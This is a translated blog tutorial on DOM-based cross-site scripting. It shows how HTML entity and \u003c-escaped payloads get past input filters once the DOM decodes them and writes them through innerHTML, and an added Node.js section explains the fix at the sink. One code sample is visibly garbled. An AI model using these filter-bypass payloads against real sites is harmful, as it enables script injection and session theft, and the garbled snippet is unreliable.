Some experience with DOM XSS (cross-site scripting)

Source: Internet
Author: User

Comments: We have all seen the harm XSS can do: CSRF, trojans, cookie theft, AJAX requests, XSS shells and many other exploitation techniques all start from an XSS bug.
Most of the material you normally find deals with direct input and output (the reflected kind), which is usually easy to filter.
DOM XSS is the other kind: the injected content is not output directly by the server,
so you cannot see it in the page source.
For example, right-click this page and view the source: what you see there is the result of direct input and output.
That is the direct-output type.
Basic method for finding DOM XSS:
It usually goes like this. First, submit some normal content,
then press F12 to open the debugging tool (the Firebug plug-in in Firefox);
locate the content you sent (the debugging tool has an arrow for selecting a position on the page).
Then check whether the content you sent has ended up in any hidden or custom attributes.
Typically it looks like <a href="xxx" title="your input">xxxxxxx</a>.
Remember that if you view the page source you cannot see your sentence at all;
in other words, <a href="xxx" title="your input sentence">xxxxxxx</a> is generated dynamically.
This is where the potential problem lies. If "your input sentence" is written as xxxxxxxxx"><", the result is
<a href="xxx" title="xxxxxxxxx"><"">xxxxxxx</a>
and an HTML tag has been inserted.
But in practice ", > and < are all filtered (at this point fellow hackers will say the filter has been hit and there is no way through -_- I used to think the same).
Instead, enter the sentence
xxxxxxxxx&quot;&gt;&lt;img&gt;&lt;&quot;
Because the final result is generated dynamically from the DOM, &quot; automatically becomes ". Everyone finds that strange, so let's explain it:
&gt; ---> >
&lt; ---> <
So the final result is <a href="xxx" title="xxxxxxxxx"><img><"">xxxxxxx</a> (and many programmers never filter &).
Next, let's test this locally.

The code is as follows:
<div id="m">x</div>
<script>
var x = "content";
document.getElementById("m").innerHTML = x;
</script>

Here content is whatever we enter, for example <script>, <iframe> and other tags. If a typical site filters escape characters such as < ' " > on input, breaking through is very hard for us.
Test:

The code is as follows:
<script>
function test(n){
alert(n);}
</script>
</img>
</img>&#x27

Here is an encoding example for everyone.

The code is as follows:
<div id="y"></div>
<embed src=&quot;dependencies><#.mp3"></p><script>
document.getElementById("y").innerHTML = document.getElementById("x").alt;
</script>
The pattern is xxx.innerHTML = yyy.

The encoding that successfully bypassed the filter on a certain attribute (" as &quot;, ' as &#39;) is not something I invented, so don't ask me about it -_-~!
We can also test it like this.

The code is as follows:
<div id="m">x</div>
<script>
var x = "\u003ciframe onload=alert(1)\u003e";
document.getElementById("m").innerHTML = x;
</script>
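To make the two mechanisms above concrete (the entity decoding that happens when script reads an attribute such as title or alt, and the \u003c escapes that a JavaScript string literal resolves before the filter ever sees a <), here is an added example that is not part of the original post. It runs under Node.js without a browser: decodeAttributeValue models the HTML parser's attribute decoding, naiveInputFilter is the kind of raw-input check the post says is usually in place, tagsCreatedBy lists the tags an innerHTML write would create, and escapeHtml is the fix, encoding at the innerHTML sink (or using textContent instead). The payload strings are the ones from the post; the function names are my own.

```javascript
// Added example (not from the original post). Models the browser steps the
// post describes so the difference between the raw page source and the value
// the DOM hands to script can be checked offline, under Node.js.

const NAMED_ENTITIES = { quot: '"', gt: '>', lt: '<', amp: '&', apos: "'" };

// What the HTML parser does to an attribute value before element.title or
// element.alt returns it to script: entities are decoded to literal characters.
// A numeric reference without a trailing ';' (as in &#x27) is decoded too.
function decodeAttributeValue(raw) {
  return raw.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const isHex = body[1].toLowerCase() === 'x';
      const code = isHex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(code) ? String.fromCodePoint(code) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// The kind of input filter the post says sites typically apply: reject the raw
// submitted text if it contains any of < > " '. It never sees the decoded form.
function naiveInputFilter(raw) {
  return !/[<>"']/.test(raw);
}

// Tag names the HTML parser would create if `value` were assigned to innerHTML.
// Used here as a check on what reaches the sink, not as a sanitizer.
function tagsCreatedBy(value) {
  const tags = [];
  const re = /<([a-z][a-z0-9]*)/gi;
  let m;
  while ((m = re.exec(value)) !== null) tags.push(m[1].toLowerCase());
  return tags;
}

// The fix: encode at the sink, right before the innerHTML write (or, better,
// assign to textContent, which never parses markup). Encoding on input alone is
// not enough here because the DOM decodes it again before script sees the value.
function escapeHtml(value) {
  return value.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// The entity-encoded sentence from the post, as it sits in the page source.
const ENCODED_INPUT = 'xxxxxxxxx&quot;&gt;&lt;img&gt;&lt;&quot;';
// The post's last test: a JavaScript string literal with \u003c / \u003e escapes.
// The JS engine resolves them, so the variable already holds < and >.
const UNICODE_LITERAL = "\u003ciframe onload=alert(1)\u003e";

function walkThrough() {
  const decoded = decodeAttributeValue(ENCODED_INPUT);
  return {
    passesInputFilter: naiveInputFilter(ENCODED_INPUT),  // true: no raw < > " '
    valueSeenByScript: decoded,                          // xxxxxxxxx"><img><"
    tagsFromInnerHtml: tagsCreatedBy(decoded),           // ['img']
    tagsFromLiteral: tagsCreatedBy(UNICODE_LITERAL),     // ['iframe']
    tagsAfterEscape: tagsCreatedBy(escapeHtml(decoded)), // []
  };
}

console.log(walkThrough());
```

The round trip decodeAttributeValue(escapeHtml(x)) === x is the point to remember: whatever encoding was applied on the way in, the DOM undoes it when script reads the attribute, so the write to innerHTML has to be protected on its own, either by encoding there or by not using innerHTML for untrusted data at all.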

Unicode character list: http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8
XSS security test character conversion tool: http://app.baidu.com/app/enter? Appid = 1, 280383
Author: 90sec
